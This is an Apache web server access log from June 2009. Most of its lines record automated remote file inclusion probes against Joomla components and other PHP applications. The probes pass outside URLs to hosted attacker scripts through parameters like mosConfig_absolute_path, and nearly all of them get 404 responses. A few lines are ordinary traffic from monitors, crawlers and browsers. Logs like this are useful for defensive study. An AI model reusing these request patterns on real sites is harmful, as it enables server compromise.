89.38.128.43 - - [24/Jun/2009:06:52:42 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:52:42 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:52:42 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.84.177.170 - - [24/Jun/2009:06:52:42 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:52:48 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:52:49 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
217.147.29.190 - - [24/Jun/2009:06:52:59 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:06:53:02 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:53:02 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.84.177.170 - - [24/Jun/2009:06:53:20 -0400] "GET /logs/access_log.Q109061500%20//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
84.232.4.1 - - [24/Jun/2009:06:53:35 -0400] "GET /logs/error_log.Q109051800/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
84.232.4.1 - - [24/Jun/2009:06:53:35 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
84.232.4.1 - - [24/Jun/2009:06:53:35 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
209.59.12.99 - - [24/Jun/2009:06:53:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.242.165.138 - - [24/Jun/2009:06:53:58 -0400] "GET /logs/access_log.Q109061800///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
204.202.23.11 - - [24/Jun/2009:06:53:59 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.65"
204.202.23.11 - - [24/Jun/2009:06:53:59 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
123.242.165.138 - - [24/Jun/2009:06:53:59 -0400] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
204.202.23.11 - - [24/Jun/2009:06:53:59 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
123.242.165.138 - - [24/Jun/2009:06:54:00 -0400] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
172.16.1.180 - - [24/Jun/2009:06:54:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:54:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:54:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
84.232.4.1 - - [24/Jun/2009:06:54:28 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
89.38.128.43 - - [24/Jun/2009:06:55:00 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
204.202.23.11 - - [24/Jun/2009:06:55:01 -0400] "GET /logs/access_log.Q109052900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.65"
89.38.128.43 - - [24/Jun/2009:06:55:11 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
172.16.1.180 - - [24/Jun/2009:06:55:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:55:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:55:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
70.48.13.2 - - [24/Jun/2009:06:55:29 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:06:55:29 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:06:55:29 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
38.99.44.103 - - [24/Jun/2009:06:55:42 -0400] "GET /images/_notes/nav_home_temp_on.jpg.mno HTTP/1.0" 200 251 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
124.138.156.3 - - [24/Jun/2009:06:55:45 -0400] "GET /logs/access_log.Q109061200/bookmark4u/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:55:45 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:55:45 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
84.232.4.1 - - [24/Jun/2009:06:55:46 -0400] "GET /logs/error_log.Q109051800%20/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
61.222.190.185 - - [24/Jun/2009:06:56:12 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
61.222.190.185 - - [24/Jun/2009:06:56:12 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.222.190.185 - - [24/Jun/2009:06:56:12 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:06:56:13 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
123.242.165.138 - - [24/Jun/2009:06:57:22 -0400] "GET /logs/access_log.Q109061500///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
61.222.190.185 - - [24/Jun/2009:06:57:45 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:57:52 -0400] "GET /logs/access_log.Q109060600/bookmark4u/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
204.202.23.11 - - [24/Jun/2009:06:57:58 -0400] "GET /logs/access_log.Q109052900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.65"
218.38.16.107 - - [24/Jun/2009:06:57:58 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.38.16.107 - - [24/Jun/2009:06:57:58 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.38.16.107 - - [24/Jun/2009:06:58:07 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.242.165.138 - - [24/Jun/2009:06:58:20 -0400] "GET /logs/access_log.Q109050800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
218.38.16.107 - - [24/Jun/2009:06:58:23 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.38.16.107 - - [24/Jun/2009:06:58:23 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.38.16.107 - - [24/Jun/2009:06:58:23 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
123.242.165.138 - - [24/Jun/2009:06:58:36 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
209.59.12.99 - - [24/Jun/2009:06:58:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.90.73.82 - - [24/Jun/2009:06:59:18 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
124.138.156.3 - - [24/Jun/2009:06:59:22 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:59:22 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:59:22 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:59:38 -0400] "GET /logs/error_log.Q109053100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
61.222.190.185 - - [24/Jun/2009:06:59:39 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
61.222.190.185 - - [24/Jun/2009:06:59:39 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.222.190.185 - - [24/Jun/2009:06:59:39 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:59:52 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:59:52 -0400] "GET /logs/access_log.Q109052300/index.php?option=com_custompages&cpage=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:59:52 -0400] "GET /index.php?option=com_custompages&cpage=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:07:00:18 -0400] "GET /logs/access_log.Q109060900/index.php?option=com_custompages&cpage=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:07:00:30 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
155.212.232.66 - - [24/Jun/2009:07:00:35 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:07:00:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:07:00:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:07:00:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:07:00:38 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [24/Jun/2009:07:00:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [24/Jun/2009:07:00:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [24/Jun/2009:07:00:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
61.222.190.185 - - [24/Jun/2009:07:00:53 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
61.222.190.185 - - [24/Jun/2009:07:00:53 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
61.222.190.185 - - [24/Jun/2009:07:00:53 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:07:00:58 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L2012EF366E907300E520037+WSEQ(S0060):1+OUITEM(A0200):04948201 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.147.29.190 - - [24/Jun/2009:07:01:22 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:07:01:48 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:07:01:48 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:07:01:48 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:07:01:50 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.16.107 - - [24/Jun/2009:07:01:55 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.38.16.107 - - [24/Jun/2009:07:02:12 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:07:02:21 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:07:02:21 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
172.16.1.180 - - [24/Jun/2009:07:02:30 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:02:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:02:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
61.222.190.185 - - [24/Jun/2009:07:03:09 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.222.190.185 - - [24/Jun/2009:07:03:09 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
61.222.190.185 - - [24/Jun/2009:07:03:11 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
38.102.74.19 - - [24/Jun/2009:07:03:14 -0400] "GET /index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
218.38.16.107 - - [24/Jun/2009:07:03:24 -0400] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.38.16.107 - - [24/Jun/2009:07:03:24 -0400] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.38.16.107 - - [24/Jun/2009:07:03:24 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:07:03:33 -0400] "GET /logs/access_log.Q109051600%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:07:03:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.222.190.185 - - [24/Jun/2009:07:03:53 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:07:04:07 -0400] "GET /logs/access_log.Q109061200%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
172.16.1.180 - - [24/Jun/2009:07:04:08 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:04:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:04:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
85.17.10.239 - - [24/Jun/2009:07:04:43 -0400] "GET /logs/access_log.Q109060400/hidden/conf.php?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.10.239 - - [24/Jun/2009:07:04:43 -0400] "GET /hidden/conf.php?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.10.239 - - [24/Jun/2009:07:04:43 -0400] "GET /logs/hidden/conf.php?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:07:04:48 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:04:57 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:04:57 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:04:57 -0400] "GET //skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:05:05 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
70.48.13.2 - - [24/Jun/2009:07:05:17 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.38.16.107 - - [24/Jun/2009:07:05:24 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
172.16.1.180 - - [24/Jun/2009:07:05:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:05:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:05:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
208.111.94.201 - - [24/Jun/2009:07:06:17 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:07:06:17 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:07:06:17 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
